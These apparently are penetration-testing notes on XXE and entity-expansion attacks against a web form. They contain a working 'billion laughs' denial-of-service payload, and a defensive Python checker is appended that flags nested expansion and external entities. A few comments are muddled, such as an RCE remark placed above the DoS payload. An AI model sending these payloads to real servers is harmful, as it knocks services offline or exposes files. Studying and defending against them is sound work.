DOS
this attack no longer works on modern web servers such as Apache, as modern browsers protect against entity self-reference
#once the internal XML entities are confirmed to expand, use the external entity keyword to test for local file disclosure
#find web pages that accept an XML user input
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
input field: 127.0.0.1
...
* submit the expected user input
BURP > Proxy > Intercept > Raw
Request
...
POST /submitDetails.php HTTP/1.1
<?xml version="1.0" encoding="UTF-8"?>
<root>
<name>First</name>
<tel></tel>
<email>email@email.com</email>
<message>This is a test email</message>
</root>
* forms that appear to send user input in XML format can be tested for a potential XXE vulnerability
- the target page may be vulnerable to XXE injection if the user input isn't properly sanitized or safely parsed
#identify which elements are displayed in order to know which elements to inject malicious XML input into
#if no elements are displayed, use the blind XXE injection method
BURP > Repeater
Request
...
<?xml version="1.0" encoding="UTF-8"?>
<root>
<name>First</name>
<tel></tel>
<email>email@email.com</email>
<message>This is a test email</message>
</root>
Response
...
HTTP/1.1 200 OK
check your email email@email.com for verification...
* the email field is reflected in the response and may be vulnerable to XXE injection
#The expect module is not enabled/installed by default on modern PHP servers, so this attack may not always work
#test for and exploit the XXE vulnerability to gain RCE
BURP > Repeater
Request
...
POST /submitDetails.php HTTP/1.1
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
<!ENTITY a0 "DOS">
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
<!ENTITY a5 "&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;">
<!ENTITY a6 "&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;">
<!ENTITY a7 "&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;">
<!ENTITY a8 "&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;">
<!ENTITY a9 "&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;">
<!ENTITY a10 "&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;">
]>
<root>
<name>First</name>
<tel></tel>
<email>&a10;</email>
<message>This is a test email</message>
</root>
* This payload defines the a0 entity as "DOS", references it ten times in a1,
references a1 ten times in a2, and so on; expanding a10 exhausts the back-end
server's memory because each level of nested references multiplies the output.
Response
...
HTTP/1.1 200 OK
check your email testCompany for verification...
...
...
* if the XML input in the HTTP request has no DTD declared within the XML data itself or referenced externally,
a DTD must be added before defining an entity; if the DOCTYPE is already declared in the XML request,
only the ENTITY element is required
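Added example (not part of the original notes): a defender-side pre-parse check that reads the DOCTYPE of an incoming request body, estimates how many bytes the entity references would expand to, and flags external (SYSTEM/PUBLIC) entities, so a gateway or the application can reject the document before a real XML parser touches it. The sample request bodies are constructed here; SAMPLE_DOS rebuilds the a0..a10 declarations from the notes above, and the file path in SAMPLE_XXE is a placeholder. The regexes are deliberately simple and cover only the internal subset as written in those notes.

```python
"""Pre-parse check for nested entity expansion and external entities."""
import re
from typing import Dict, List, Optional, Set, Tuple

DOCTYPE_RE = re.compile(r'<!DOCTYPE\b[^\[>]*(?:\[(.*?)\])?\s*>', re.S)
ENTITY_RE = re.compile(
    r'<!ENTITY\s+(%\s+)?([\w.:-]+)\s+(?:(SYSTEM|PUBLIC)\s+)?(?:"([^"]*)"|\'([^\']*)\')',
    re.I,
)
REF_RE = re.compile(r'&([\w.:-]+);')
# The five predefined XML entities expand to one character each.
PREDEFINED = {"lt": 1, "gt": 1, "amp": 1, "quot": 1, "apos": 1}


def split_doctype(xml: str) -> Tuple[Optional[str], str, bool]:
    """Return (internal subset or None, document without DOCTYPE, external-DTD flag)."""
    m = DOCTYPE_RE.search(xml)
    if not m:
        return None, xml, False
    header = m.group(0).split("[", 1)[0]          # text before the internal subset
    external_dtd = re.search(r"\b(SYSTEM|PUBLIC)\b", header, re.I) is not None
    return (m.group(1) or ""), xml[: m.start()] + xml[m.end():], external_dtd


def analyze(xml: str, max_expansion: int = 1_000_000) -> Dict[str, object]:
    """Estimate entity expansion and report why a document should be rejected."""
    subset, body, external_dtd = split_doctype(xml)
    internal: Dict[str, str] = {}
    external: List[str] = []
    for is_param, name, kind, dq, sq in ENTITY_RE.findall(subset or ""):
        if kind:                       # SYSTEM/PUBLIC: parser would fetch a resource
            external.append(name)
        elif not is_param:             # %param; references are not expanded here
            internal[name] = dq if dq else sq

    memo: Dict[str, int] = {}
    on_stack: Set[str] = set()
    recursive = False

    def expanded_len(name: str) -> int:
        """Bytes produced by fully expanding one entity (memoized DFS)."""
        nonlocal recursive
        if name in PREDEFINED:
            return PREDEFINED[name]
        if name in memo:
            return memo[name]
        if name in on_stack:           # a -> b -> a: unbounded expansion
            recursive = True
            return 0
        text = internal.get(name)
        if text is None:               # undefined or external: nothing to expand
            return 0
        on_stack.add(name)
        total = len(REF_RE.sub("", text))          # literal characters
        for ref in REF_RE.findall(text):           # plus every nested reference
            total += expanded_len(ref)
        on_stack.discard(name)
        memo[name] = total
        return total

    expanded = sum(expanded_len(ref) for ref in REF_RE.findall(body))
    reasons: List[str] = []
    if external_dtd or external:
        reasons.append("external entity or DTD declared (XXE risk)")
    if recursive:
        reasons.append("recursive entity definition")
    if expanded > max_expansion:
        reasons.append(f"entity expansion of {expanded} bytes exceeds {max_expansion}")
    return {
        "has_doctype": subset is not None,
        "external_entities": external,
        "expanded_bytes": expanded,
        "amplification": expanded / max(len(xml), 1),
        "verdict": "reject" if reasons else "allow",
        "reasons": reasons,
    }


# Constructed sample request bodies for a self-test.
SAMPLE_OK = ('<?xml version="1.0" encoding="UTF-8"?>'
             '<root><name>First</name><email>email@email.com</email></root>')
SAMPLE_DOS = (                          # rebuilds the a0..a10 declarations from the notes
    '<?xml version="1.0" encoding="UTF-8"?>\n<!DOCTYPE email [\n<!ENTITY a0 "DOS">\n'
    + "".join('<!ENTITY a%d "%s">\n' % (i, "&a%d;" % (i - 1) * 10) for i in range(1, 11))
    + "]>\n<root><email>&a10;</email></root>"
)
SAMPLE_XXE = ('<?xml version="1.0"?><!DOCTYPE root [<!ENTITY ext SYSTEM '
              '"file:///tmp/constructed-example.txt">]><root><email>&ext;</email></root>')

if __name__ == "__main__":
    for label, doc in (("benign", SAMPLE_OK), ("nested expansion", SAMPLE_DOS),
                       ("external entity", SAMPLE_XXE)):
        r = analyze(doc)
        print(f"{label:17} verdict={r['verdict']:6} expanded={r['expanded_bytes']:,} "
              f"reasons={r['reasons']}")
```

Running the script shows the notes' payload expanding to 30,000,000,000 bytes (3 bytes of "DOS" times ten levels of tenfold nesting) from a request of under a kilobyte, which is the amplification that exhausts the back end. This check is defense in depth, not the primary fix: the durable mitigation is parser configuration that refuses DTD processing and entity substitution (for PHP's libxml-based parsers, never pass LIBXML_NOENT), so that neither the nested references nor a SYSTEM entity are ever resolved.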